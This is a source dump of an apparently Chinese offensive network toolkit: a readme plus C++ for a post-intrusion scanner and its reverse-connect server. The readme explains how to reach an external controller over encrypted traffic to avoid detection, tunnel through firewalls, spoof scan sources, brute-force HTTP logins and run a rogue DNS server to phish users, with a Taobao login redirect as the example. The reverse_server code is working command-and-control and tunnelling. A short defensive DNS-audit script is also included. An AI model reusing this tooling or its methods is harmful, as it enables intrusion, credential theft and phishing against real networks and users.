├── exe
    ├── reverse_server.exe
    └── scanner_framework.exe
├── readme.md
├── reverse_server
    ├── main.cpp
    ├── network_encoder.cpp
    ├── network_encoder.h
    ├── network_tunnal.cpp
    ├── network_tunnal.h
    ├── reverse_server.dsp
    ├── reverse_server.dsw
    ├── reverse_server.ncb
    ├── reverse_server.opt
    ├── reverse_server.plg
    ├── scan_tcp.cpp
    └── scan_tcp.h
└── scanner_framework
    ├── Release
        ├── encoder_base64.obj
        ├── local_information.obj
        ├── local_network.obj
        ├── main.obj
        ├── network_crack.obj
        ├── network_encoder.obj
        ├── network_route.obj
        ├── network_server_dns.obj
        ├── resolver_dictionary.obj
        ├── resolver_express.obj
        ├── resolver_html.obj
        ├── resolver_http.obj
        ├── resolver_string.obj
        ├── scan_arp.obj
        ├── scan_icmp.obj
        ├── scan_tcp.obj
        ├── scanner_framework.exe
        ├── scanner_framework.pch
        └── vc60.idb
    ├── encoder_base64.cpp
    ├── encoder_base64.h
    ├── local_information.cpp
    ├── local_information.h
    ├── local_network.cpp
    ├── local_network.h
    ├── local_thread.cpp
    ├── local_thread.h
    ├── main.cpp
    ├── network_crack.cpp
    ├── network_crack.h
    ├── network_dictionary.h
    ├── network_encoder.cpp
    ├── network_encoder.h
    ├── network_route.cpp
    ├── network_route.h
    ├── network_server_dns.cpp
    ├── network_server_dns.h
    ├── resolver_dictionary.cpp
    ├── resolver_dictionary.h
    ├── resolver_express.cpp
    ├── resolver_express.h
    ├── resolver_html.cpp
    ├── resolver_html.h
    ├── resolver_http.cpp
    ├── resolver_http.h
    ├── resolver_string.cpp
    ├── resolver_string.h
    ├── route_design.png
    ├── scan_arp.cpp
    ├── scan_arp.h
    ├── scan_icmp.cpp
    ├── scan_icmp.h
    ├── scan_tcp.cpp
    ├── scan_tcp.h
    ├── scan_tcp_header.h
    ├── scanner_framework.dsp
    ├── scanner_framework.dsw
    ├── scanner_framework.ncb
    ├── scanner_framework.opt
    └── scanner_framework.plg


/exe/reverse_server.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/exe/reverse_server.exe
--------------------------------------------------------------------------------
/exe/scanner_framework.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/exe/scanner_framework.exe


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------

## scanner_framework ##


Chinese (translated):
A network probing framework for exploring other network devices after breaking into an internal network. The probe is small and feature-rich, and includes a reverse connection that reaches out from the internal network to a control terminal on the external network. Communication data is dynamically encrypted, so no more worrying about the police finding out I am up to no good. To make it easier to crack devices with weak passwords, it has a built-in online cracking function (HTTP cracking only for now). If these features are not enough, you can use port mapping to connect the tools you need through the tunnel directly to a port on a specified host in the internal network and scan from there. -- LCatro

English:
This is an internal network scanner similar to meterpreter. I will add more functions to it (it currently includes many basic network scans and network cracking [like BurpSuite, HTTP cracking]). The reverse connect function lets the attacker manage a compromised machine over encrypted communication. The tunnel connection lets the attack process's network traffic cross the internal network's firewall.


***

### How to launch it
__scanner.exe__ Launch from the console
__scanner.exe -bind [%port%]__ Bind a local port and wait for a remote connection
__scanner.exe -recon %ip% [%port%]__ Reverse connect for remote access; the default port is 80. WARNING! Remember to launch reverse_server first and only then launch scanner.exe with this parameter, otherwise scanner.exe cannot connect

### How to use it
Scan for live hosts on the current network segment with ARP requests and collect data automatically
__using:arp__
Get this machine's network information
__using:local__
Test whether a host is reachable (ping)
__using:ping %ip/host%__
TCP SYN scan of a host (-P sets the ports to test; -F sets fake IPs to hide the scanner in the attack traffic)
__using:scan %ip% [-P:[port1,port2,port3,...]] [-F:[fake_ip1,fake_ip2,...]]__
Flood a host (don't use it, because you will expose yourself, so I never developed this function)
__using:flood %ip% [-P:[port1,...]] [-F:[fake_ip1,...]]__
Online cracking
__using:crack %ip% %port% [%user_dictionary_path% %password_dictionary_path%]__
Trace route
__using:tracert %ip/host%__
Fetch an HTML page from a server
__using:getpage %ip% [-PORT:%port%] [-PATH:%path%]__
Start port forwarding (tunnel)
__using:route -R:[%remote_ip%,%remote_port%] -L:[[%local_ip%,]%local_port%]__
Start the DNS server
__using:dns [run|start] | add %host% %ip% | delete %ip%__
Get the external (internet-facing, not internal) IP address and a rough location
__using:ip__
Show help
__using:help__
Exit the scanner
__using:quit__


***

### About Online Crack
>Online cracking works by building a specific HTTP packet by hand; the program then exhaustively tests account names and passwords from a dictionary.
>
>What is an expression?
>
>An expression gives the program a template to fill in: during the exhaustive test that follows, data is substituted for the keywords inside the expression. Here is an online cracking example:
>
>A PHP server is running on the local network at 192.168.1.103:80. Enter the crack command in the scanner:
>
>crack 192.168.1.103 80
>
>You are then prompted for the expression:
>
>input your crack express:
>
>Enter the packet data:
>POST http://192.168.1.103:80/api/analays.php HTTP/1.1
>Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
>Referer: http://192.168.1.103/api/analays.php
>Accept-Language: zh-CN
>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
>Content-Type: application/x-www-form-urlencoded
>Accept-Encoding: gzip, deflate
>Host: 192.168.1.103
>Content-length: %length%
>Pragma: no-cache
>
>__user=%username%&pass=%password%__
>
>Here Content-length: %length% tells the program to fill in the size of the body automatically [because this length changes], and %username% and %password% are filled in automatically with the user name and password.
>[Not all of them have to be used; for example, to crack a Mercury router, %password% alone is enough to start.]
>Finally, enter  to confirm that the packet is complete; if you make a mistake somewhere along the way, enter  to re-enter the crack packet. The success condition entered below works the same way.
>
>input your check term:
>
>Enter the success condition. Testing showed that when the password is correct the page returns a string containing Success, so that string is used as the test for a successful crack.
>Success
>
>now cracking!
>
>__network crack - target:192.168.1.103:80
>username:root password:toor__
>
>Cracking complete
>
>
>Expression functions:
>
>__base64(%string%)__ -- base64-encode the string
>__time()__ -- get the system time
>__len(%string%)__ -- count the length of the string
>__rnd([%low%-%up%])__ -- generate a random number between %low% and %up%
>
>Example :
>
>Packet for cracking a Mercury router (everything else is much the same; the key part is the Cookie):
>
>Cookie: a2404_pages=10; a2404_times=5; __Authorization=Basic%20base64(admin:%password%)__
>
>%password% is filled in first and the result is then base64-encoded
>
>WARNING! Recursion is beyond my skill for now, sorry ..
>


***

#### About DNS Server

The DNS server is for phishing inside the internal network, for example redirecting to forged sites to collect more personal information or spoofing application updates. If the usage above is still unclear, see here:

dns run    start the DNS server
dns exit    exit the DNS server
dns add m.login.taobao.com 127.0.0.1    point Taobao's mobile login domain m.login.taobao.com at the local IP through the DNS setting
dns delete www.baidu.com    delete this DNS record

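A defender-side check for the record override shown above (`dns add m.login.taobao.com 127.0.0.1`), as an added example that is not part of the original project: it audits resolver answers for public names that resolve to loopback or private addresses, and for answers that differ from a pinned baseline. The log format, the internal suffix list and the baseline are assumptions, and the sample lines are constructed.

```python
import ipaddress

# Constructed resolver log lines: "<client> <qname> <qtype> <answer>".
SAMPLE_LOG = """\
192.168.1.23 m.login.taobao.com A 127.0.0.1
192.168.1.23 www.example.com. A 198.51.100.7
192.168.1.40 printer.corp.lan A 192.168.1.77
192.168.1.40 Update.Example.org A 192.168.1.103
192.168.1.51 www.example.com A 203.0.113.9
192.168.1.51 broken-line
"""

# Assumptions for this sketch: suffixes that are legitimately internal, and
# the expected answers for names worth pinning.
INTERNAL_SUFFIXES = (".lan", ".local", ".internal")
BASELINE = {"www.example.com": {"198.51.100.7"}}

# Ranges a public hostname should never resolve to.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]


def normalise(qname):
    """Lower-case the name and drop the trailing root dot."""
    return qname.rstrip(".").lower()


def audit_dns_answers(log_text, baseline=BASELINE,
                      internal_suffixes=INTERNAL_SUFFIXES):
    """Return (client, qname, answer, reason) for each suspicious A answer."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4 or fields[2] != "A":
            continue  # malformed line or a record type this check ignores
        client, qname, _, answer = fields
        qname = normalise(qname)
        try:
            addr = ipaddress.IPv4Address(answer)
        except ipaddress.AddressValueError:
            continue
        internal_name = qname.endswith(internal_suffixes)
        if not internal_name and any(addr in net for net in NON_ROUTABLE):
            # The pattern from the readme: a public login or update domain
            # answered with a loopback or LAN address.
            findings.append((client, qname, answer,
                             "public name -> non-routable address"))
        elif qname in baseline and answer not in baseline[qname]:
            findings.append((client, qname, answer,
                             "answer differs from baseline"))
    return findings


if __name__ == "__main__":
    for finding in audit_dns_answers(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Clients that appear in the findings are the ones whose resolver setting (DHCP option or static DNS) should be compared against the network's legitimate DNS servers.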

#### Port forwarding design
#### ![image](https://raw.githubusercontent.com/lcatro/network_backdoor/master/scanner_framework/route_design.png)


***

### Other

##### reverse_server is the server side used for reverse connections

##### Launching scanner.exe with the -bind parameter means you have to connect to it yourself, but that client has not been written yet and there is no real need for it; it will come later ..

--------------------------------------------------------------------------------
/reverse_server/main.cpp:
--------------------------------------------------------------------------------

#include
#include
#include
#include

#include

#include
#include

#include "network_encoder.h"
#include "network_tunnal.h"

#pragma comment (lib,"ws2_32")

using std::string;

#define PACKET_SEND_BUFFER 1024
#define PAGE_BUFFER_LENGTH 1024*10

#define DEFAULT_PORT 80


string number_to_string(long in_number) {
    string result;
    char link_string[16]={0};
    sprintf(link_string,"%ld",in_number);
    result=link_string;
    return result;
}

long string_to_number(const char* input_string) {
    long return_number=0;
    try {
        for (int number_index=strlen(input_string)-1;number_index>=0;--number_index,++input_string) {
            if (48<=*input_string && *input_string<=57)
                return_number+=(*input_string-48)*pow(10,number_index);
            else
                return -1;
        }
    } catch (...) {
        return -1;
    }
    return return_number;
}

const string quit("quit");
const string crack("crack");
const string end("");
bool connect_stat=false;

static void recv_thread(unsigned int sock_accept) {
    while (1) {
        char result[PAGE_BUFFER_LENGTH]={0};
        int recv_length=recv(sock_accept,result,PAGE_BUFFER_LENGTH,0);
        if (SOCKET_ERROR!=recv_length) {
            network_decode(result,recv_length);
            printf("%s\n",result);
        } else {
            printf("WARNING! lost connect ..\n");
            break;
        }
    }
    connect_stat=false;
}

void main(void) {
    int bind_port=DEFAULT_PORT;
    char set_bind='N';
    printf("use default port (Y/N)?:");
    scanf("%c",&set_bind);

    if ('N'==set_bind || 'n'==set_bind) {
        printf("set local bind port:");
        scanf("%d",&bind_port);
        gets(&set_bind);
    }

    WSADATA init;
    WSAStartup(1,&init);

    SOCKET sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

    if (SOCKET_ERROR!=sock) {
        sockaddr_in local={0};
        local.sin_family=AF_INET;
        local.sin_port=htons(bind_port);

        if (SOCKET_ERROR!=bind(sock,(const sockaddr*)&local,sizeof(local))) {
            listen(sock,1);

            printf("listening!\n");
            SOCKET sock_accept=accept(sock,NULL,NULL);

            if (SOCKET_ERROR!=sock_accept) {
                connect_stat=true;
                printf("reverse connect OK!:\n");
                CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)recv_thread,(void*)sock_accept,NULL,NULL);
                while (connect_stat) {
                    printf(">");
                    char command[PACKET_SEND_BUFFER]={0};
                    gets(command);
                    string resolve(command);
                    unsigned int command_length=strlen(command);
                    command_length=network_encode(command,command_length);

                    send(sock_accept,command,command_length,0);

                    if (-1!=resolve.find("route")) {
                        string port(resolve.substr(resolve.find_last_of("-L:[")+1,resolve.length()));
                        port=port.substr(0,port.find("]"));
                        if (-1!=port.find(","))
                            port=port.substr(port.find(",")+1,port.length());
                        unsigned int local_port=string_to_number(port.c_str());

                        network_tunnal_open(local_port);
                    }
                    if (crack==resolve) {
                        unsigned int end_count=0;
                        while (1) {
                            char line[PACKET_SEND_BUFFER]={0};
                            gets(line);
                            string line_express(line);
                            unsigned int line_length=strlen(line);
                            line_length=network_encode(line,line_length);

                            send(sock_accept,line,line_length,0);
                            if (end==line_express)
                                ++end_count;
                            if (end_count>=2)
                                break;
                        }
                    } else if (quit==resolve) {
                        printf("Exit Server!\n");
                        break;
                    }
                }
                closesocket(sock_accept);
            }
        }
    }
    closesocket(sock);
}


--------------------------------------------------------------------------------
/reverse_server/network_encoder.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/network_encoder.cpp


--------------------------------------------------------------------------------
/reverse_server/network_encoder.h:
--------------------------------------------------------------------------------

#ifndef _NETWORK_ENCODER_H__
#define _NETWORK_ENCODER_H__

unsigned int network_encode(char* encode_string,unsigned int encode_string_length_) ;
void network_decode(char* decode_string,unsigned int decode_string_length);

#endif


--------------------------------------------------------------------------------
/reverse_server/network_tunnal.cpp:
--------------------------------------------------------------------------------

#include
#include

#include

#include

#include "network_encoder.h"
#include "scan_tcp.h"

using std::pair;

typedef pair pair_handle;

#define PACKET_RECV_BUFFER 1024

static long string_to_number(const char* input_string) {
    long return_number=0;
    try {
        for (int number_index=strlen(input_string)-1;number_index>=0;--number_index,++input_string) {
            if (48<=*input_string && *input_string<=57)
                return_number+=(*input_string-48)*pow(10,number_index);
            else
                return -1;
        }
    } catch (...) {
        return -1;
    }
    return return_number;
}

void network_tunnal_init(void) {
    WSADATA init;
    WSAStartup(1,&init);
}

void network_tunnal_close(void) {
    WSACleanup();
}

static void network_route_thread_tunnal(pair_handle* pair_socket) {
    char recv_buffer[PACKET_RECV_BUFFER]={0};

    while (true) {
        unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER);

        if (-1==recv_length || !recv_length)
            break;

        network_decode(recv_buffer,recv_length);
        scan_tcp_send(pair_socket->second,recv_buffer,recv_length);
        memset(recv_buffer,0,recv_length);
    }

    delete pair_socket;
}

static void network_route_thread_local(pair_handle* pair_socket) {
    char recv_buffer[PACKET_RECV_BUFFER]={0};

    while (true) {
        unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER);

        if (-1==recv_length || !recv_length)
            break;

        recv_length=network_encode(recv_buffer,recv_length);
        scan_tcp_send(pair_socket->second,recv_buffer,recv_length);
        memset(recv_buffer,0,recv_length);
    }

    delete pair_socket;
}

static void network_route_thread_main(unsigned int local_port) {
    unsigned int local_listen=scan_tcp_bind(local_port);

    if (-1!=local_listen) {
        unsigned int reverse_connect=scan_tcp_accept(local_listen);
        unsigned int local_connect =scan_tcp_accept(local_listen);

        if (-1!=reverse_connect && -1!=local_listen) {
            HANDLE thread_listen=INVALID_HANDLE_VALUE,thread_connect=INVALID_HANDLE_VALUE;

            thread_listen=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_local,new pair_handle(local_connect,reverse_connect),NULL,NULL);
            thread_connect=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_tunnal,new pair_handle(reverse_connect,local_connect),NULL,NULL);

            if (INVALID_HANDLE_VALUE!=thread_listen && INVALID_HANDLE_VALUE!=thread_connect) {
                WaitForSingleObject(thread_listen,INFINITE);
                WaitForSingleObject(thread_connect,INFINITE);
                return;
            }
        }
    }
}

bool network_tunnal_open(unsigned int local_port) {
    HANDLE thread=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_main,(void*)local_port,NULL,NULL);

    if (INVALID_HANDLE_VALUE!=thread)
        return true;
    return false;
}


--------------------------------------------------------------------------------
/reverse_server/network_tunnal.h:
--------------------------------------------------------------------------------

#ifndef _NETWORK_TUNNAL_H__
#define _NETWORK_TUNNAL_H__

void network_tunnal_init(void);
void network_tunnal_close(void);
bool network_tunnal_open(unsigned int local_port);

#endif


--------------------------------------------------------------------------------
/reverse_server/reverse_server.dsp:
--------------------------------------------------------------------------------
# Microsoft Developer Studio Project File - Name="reverse_server" - Package Owner=<4>
# Microsoft Developer Studio Generated Build File, Format Version 6.00
# ** DO NOT EDIT **

# TARGTYPE "Win32 (x86) Console Application" 0x0103

CFG=reverse_server - Win32 Debug
!MESSAGE This is not a valid makefile. To build this project using NMAKE,
!MESSAGE use the Export Makefile command and run
!MESSAGE
!MESSAGE NMAKE /f "reverse_server.mak".
!MESSAGE
!MESSAGE You can specify a configuration when running NMAKE
!MESSAGE by defining the macro CFG on the command line. For example:
!MESSAGE
!MESSAGE NMAKE /f "reverse_server.mak" CFG="reverse_server - Win32 Debug"
!MESSAGE
!MESSAGE Possible choices for configuration are:
!MESSAGE
!MESSAGE "reverse_server - Win32 Release" (based on "Win32 (x86) Console Application")
!MESSAGE "reverse_server - Win32 Debug" (based on "Win32 (x86) Console Application")
!MESSAGE

# Begin Project
# PROP AllowPerConfigDependencies 0
# PROP Scc_ProjName ""
# PROP Scc_LocalPath ""
CPP=cl.exe
RSC=rc.exe

!IF "$(CFG)" == "reverse_server - Win32 Release"

# PROP BASE Use_MFC 0
# PROP BASE Use_Debug_Libraries 0
# PROP BASE Output_Dir "Release"
# PROP BASE Intermediate_Dir "Release"
# PROP BASE Target_Dir ""
# PROP Use_MFC 0
# PROP Use_Debug_Libraries 0
# PROP Output_Dir "Release"
# PROP Intermediate_Dir "Release"
# PROP Ignore_Export_Lib 0
# PROP Target_Dir ""
# ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
# ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
# ADD BASE RSC /l 0x804 /d "NDEBUG"
# ADD RSC /l 0x804 /d "NDEBUG"
BSC32=bscmake.exe
# ADD BASE BSC32 /nologo
# ADD BSC32 /nologo
LINK32=link.exe
# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
# ADD LINK32 kernel32.lib user32.lib /nologo /subsystem:console /machine:I386
# SUBTRACT LINK32 /nodefaultlib

!ELSEIF "$(CFG)" == "reverse_server - Win32 Debug"

# PROP BASE Use_MFC 0
# PROP BASE Use_Debug_Libraries 1
# PROP BASE Output_Dir "Debug"
# PROP BASE Intermediate_Dir "Debug"
# PROP BASE Target_Dir ""
# PROP Use_MFC 0
# PROP Use_Debug_Libraries 1
# PROP Output_Dir "Debug"
# PROP Intermediate_Dir "Debug"
# PROP Target_Dir ""
# ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
# ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
# ADD BASE RSC /l 0x804 /d "_DEBUG"
# ADD RSC /l 0x804 /d "_DEBUG"
BSC32=bscmake.exe
# ADD BASE BSC32 /nologo
# ADD BSC32 /nologo
LINK32=link.exe
# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
# ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept

!ENDIF

# Begin Target

# Name "reverse_server - Win32 Release"
# Name "reverse_server - Win32 Debug"
# Begin Group "Source Files"

# PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
# Begin Source File

SOURCE=.\main.cpp
# End Source File
# Begin Source File

SOURCE=.\network_encoder.cpp
# End Source File
# Begin Source File

SOURCE=.\network_tunnal.cpp
# End Source File
# Begin Source File

SOURCE=.\scan_tcp.cpp
# End Source File
# End Group
# Begin Group "Header Files"

# PROP Default_Filter "h;hpp;hxx;hm;inl"
# Begin Source File

SOURCE=.\network_encoder.h
# End Source File
# Begin Source File

SOURCE=.\network_tunnal.h
# End Source File
# Begin Source File

SOURCE=.\scan_tcp.h
# End Source File
# End Group
# Begin Group "Resource Files"

# PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
# End Group
# End Target
# End Project


--------------------------------------------------------------------------------
/reverse_server/reverse_server.dsw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/reverse_server.dsw


--------------------------------------------------------------------------------
/reverse_server/reverse_server.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/reverse_server.ncb


--------------------------------------------------------------------------------
/reverse_server/reverse_server.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/reverse_server.opt


--------------------------------------------------------------------------------
/reverse_server/reverse_server.plg:
--------------------------------------------------------------------------------
Build Log

--------------------Configuration: reverse_server - Win32 Release--------------------

Command Lines

Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPA648.tmp" with contents
[
/nologo /ML /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Release/reverse_server.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c
"C:\Users\Administrator\Desktop\code_file\scaner\reverse_server\main.cpp"
]
Creating command line "cl.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPA648.tmp"
Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPA649.tmp" with contents
[
kernel32.lib user32.lib /nologo /subsystem:console /incremental:no /pdb:"Release/reverse_server.pdb" /machine:I386 /out:"Release/reverse_server.exe"
.\Release\main.obj
.\Release\network_encoder.obj
.\Release\network_tunnal.obj
.\Release\scan_tcp.obj
]
Creating command line "link.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPA649.tmp"

Output Window

Compiling...
main.cpp
Linking...

Results

reverse_server.exe - 0 error(s), 0 warning(s)


--------------------------------------------------------------------------------
/reverse_server/scan_tcp.cpp:
--------------------------------------------------------------------------------

#include
#include
#include

#include

#include "scan_tcp.h"

#pragma comment (lib,"ws2_32")

unsigned int scan_tcp_connect(const char* target_ip,unsigned short target_port) {
    if (NULL==target_ip || !(0

#include
#include

#include "encoder_base64.h"

static const char base[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
char* base64_encode(const char* data, int data_len);
char *base64_decode(const char* data, int data_len);
static char find_pos(char ch);

char *base64_encode(const char* data, int data_len)
{
    //int data_len = strlen(data);
    int prepare = 0;
    int ret_len;
    int temp = 0;
    char *ret = NULL;
    char *f = NULL;
    int tmp = 0;
    char changed[4];
    int i = 0;
    ret_len = data_len / 3;
    temp = data_len % 3;
    if (temp > 0)
    {
        ret_len += 1;
    }
    ret_len = ret_len*4 + 1;
    ret = (char *)malloc(ret_len);

    if ( ret == NULL)
    {
        return ret;
    }
    memset(ret, 0, ret_len);
    f = ret;
    while (tmp < data_len)
    {
        temp = 0;
        prepare = 0;
        memset(changed, '\0', 4);
        while (temp < 3)
        {
            //printf("tmp = %d\n", tmp);
            if (tmp >= data_len)
            {
                break;
            }
            prepare = ((prepare << 8) | (data[tmp] & 0xFF));
            tmp++;
            temp++;
        }
        prepare = (prepare<<((3-temp)*8));
        //printf("before for : temp = %d, prepare = %d\n", temp, prepare);
        for (i = 0; i < 4 ;i++ )
        {
            if (temp < i)
            {
                changed[i] = 0x40;
            }
            else
            {
                changed[i] = (prepare>>((3-i)*6)) & 0x3F;
            }
            *f = base[changed[i]];
            //printf("%.2X", changed[i]);
            f++;
        }
    }
    *f = '\0';

    return ret;

}
/* */
static char find_pos(char ch)
{
    char *ptr = (char*)strrchr(base, ch);//the last position (the only) in base[]
    return (ptr - base);
}
/* */
char *base64_decode(const char *data, int data_len)
{
    int ret_len = (data_len / 4) * 3;
    int equal_count = 0;
    char *ret = NULL;
    char *f = NULL;
    int tmp = 0;
    int temp = 0;
    char need[3];
    int prepare = 0;
    int i = 0;
    if (*(data + data_len - 1) == '=')
    {
        equal_count += 1;
    }
    if (*(data + data_len - 2) == '=')
    {
        equal_count += 1;
    }
    if (*(data + data_len - 3) == '=')
    {//seems impossible
        equal_count += 1;
    }
    switch (equal_count)
    {
    case 0:
        ret_len += 4;//3 + 1 [1 for NULL]
        break;
    case 1:
        ret_len += 4;//Ceil((6*3)/8)+1
        break;
    case 2:
        ret_len += 3;//Ceil((6*2)/8)+1
        break;
    case 3:
        ret_len += 2;//Ceil((6*1)/8)+1
        break;
    }
    ret = (char *)malloc(ret_len);
    if (ret == NULL)
    {
        return ret;
    }
    memset(ret, 0, ret_len);
    f = ret;
    while (tmp < (data_len - equal_count))
    {
        temp = 0;
        prepare = 0;
        memset(need, 0, sizeof(need));//was 4, one byte past the end of the 3-byte array
        while (temp < 4)
        {
            if (tmp >= (data_len - equal_count))
            {
                break;
            }
            prepare = (prepare << 6) | (find_pos(data[tmp]));
            temp++;
            tmp++;
        }
        prepare = prepare << ((4-temp) * 6);
        for (i=0; i<3 ;i++ )
        {
            if (i == temp)
            {
                break;
            }
            *f = (char)((prepare>>((2-i)*8)) & 0xFF);
            f++;
        }
    }
    *f = '\0';
    return ret;
}


--------------------------------------------------------------------------------
/scanner_framework/encoder_base64.h:
--------------------------------------------------------------------------------

#ifndef _ENCODER_BASE64_H__
#define _ENCODER_BASE64_H__

char* base64_encode(const char* data,int data_length);
char* base64_decode(const char* data,int data_length);

#endif


--------------------------------------------------------------------------------
/scanner_framework/local_information.cpp:
--------------------------------------------------------------------------------

#include

#include

#include "local_information.h"

#define VER_NT_WORKSTATION 1
#define SM_SERVERR2 89

typedef struct {
    DWORD dwOSVersionInfoSize;
    DWORD dwMajorVersion;
    DWORD dwMinorVersion;
    DWORD dwBuildNumber;
    DWORD dwPlatformId;
    TCHAR szCSDVersion[128];
    WORD wServicePackMajor;
    WORD wServicePackMinor;
    WORD wSuiteMask;
    BYTE wProductType;
    BYTE wReserved;
} OSVERSIONINFOEX_;

bool get_system_version(char* output_buffer) {
    OSVERSIONINFOEX_ system_info={0};
    system_info.dwOSVersionInfoSize=sizeof(system_info);
    if (GetVersionEx((LPOSVERSIONINFO)&system_info)) {
        if (VER_PLATFORM_WIN32_NT==system_info.dwPlatformId) {
            if (VER_NT_WORKSTATION==system_info.wProductType) {
                if (10==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows 10");
                    return true;
                } else if (6==system_info.dwMajorVersion && 3==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows 8.1");
                    return true;
                } else if (6==system_info.dwMajorVersion && 2==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows 8");
                    return true;
                } else if (6==system_info.dwMajorVersion && 1==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows 7");
                    return true;
                } else if (6==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows Vista");
                    return true;
                } else if (5==system_info.dwMajorVersion && 2==system_info.dwMinorVersion) {
                    if (GetSystemMetrics(SM_SERVERR2)) {
                        strcpy(output_buffer,"Windows Server 2003 R2");
                        return true;
                    } else {
                        strcpy(output_buffer,"Windows Server 2003");
                        return true;
                    }
                }
            } else {
                if (10==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows Server Technical Preview");
                    return true;
                } else if (6==system_info.dwMajorVersion && 3==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows Server 2012 R2");
                    return true;
                } else if (6==system_info.dwMajorVersion && 2==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows Server 2012");
                    return true;
                } else if (6==system_info.dwMajorVersion && 1==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows Server 2008 R2");
                    return true;
                } else if (6==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows Server 2008");
                    return true;
                } else if (5==system_info.dwMajorVersion && 1==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows XP");
                    return true;
                } else if (5==system_info.dwMajorVersion && 0==system_info.dwMinorVersion) {
                    strcpy(output_buffer,"Windows 2008");
                    return true;
                }
            }
        } else; // other platform
    }
    return false;
}


--------------------------------------------------------------------------------
/scanner_framework/local_information.h:
--------------------------------------------------------------------------------

#ifndef _LOCAL_INFORMATION_H__
#define _LOCAL_INFORMATION_H__

bool get_system_version(char* output_buffer);

#endif


--------------------------------------------------------------------------------
